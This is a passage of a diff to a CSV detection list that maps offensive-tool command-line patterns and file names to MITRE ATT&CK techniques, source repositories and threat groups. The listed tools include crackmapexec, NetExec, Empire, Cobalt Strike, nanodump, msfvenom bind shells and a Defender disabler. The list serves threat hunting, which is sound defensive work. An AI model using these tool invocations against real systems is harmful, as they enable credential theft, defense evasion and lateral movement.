Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -watson -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "* wdb-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --wdigest disable*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* --wdigest enable*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --wdigest disable*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --wdigest enable*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* web-hacking-toolkit *","offensive_tool_keyword","web-hacking-toolkit","A web hacking toolkit Docker image with GUI applications support.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signedsecurity/web-hacking-toolkit","1","0","N/A","N/A","2","142","29","2023-01-31T10:11:30Z","2021-10-16T15:47:52Z" "* weblogic-t3-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --werfault *\temp\*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" @@ -2077,76 +2077,76 @@ "* whois-ip.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* winDefKiller *","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","0","N/A","10","4","327","47","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" "* windows/csharp_exe*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"* windows/shell/bind_tcp *","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"* Windows-Passwords.ps1*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"* -winPEAS *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"* winrm * -u * -p * --laps*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* winrm * -u * -p * -X whoami*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* winrm.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* windows/shell/bind_tcp *","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"* Windows-Passwords.ps1*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"* -winPEAS *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* winrm * -u * -p * --laps*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* winrm * -u * -p * -X whoami*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* winrm.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* --wldp-bypass=*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" -"* --wmi *SELECT *","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* wmiexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* --wmi-namespace 'root\cimv2'*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --wmi *SELECT *","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* wmiexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --wmi-namespace 'root\cimv2'*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* wmirun=true dllpath=*.dll* computername=*","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","7","1","73","8","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z" "* -wordlist * -spawnto *","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"* --wordlist=*.lst*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --wordlist=*.lst*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "* -word-list-path * -file-extensions *","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","2","138","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" -"* -WorkingHours *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1065","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -WorkingHours *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1065","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --wpad --lm --ProxyAuth --disable-ess**","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* WriteToLsass*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","0","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "* wsdd-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* ws-dirs.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"* ws-files.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"* WSPCoerce.cs*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","202","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" -"* -X '$PSVersionTable' *","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -X '[System.Environment]::Is64BitProcess'*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -X FUZZ http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"* -X whoami --obfs*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"* ws-dirs.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* ws-files.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* WSPCoerce.cs*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation 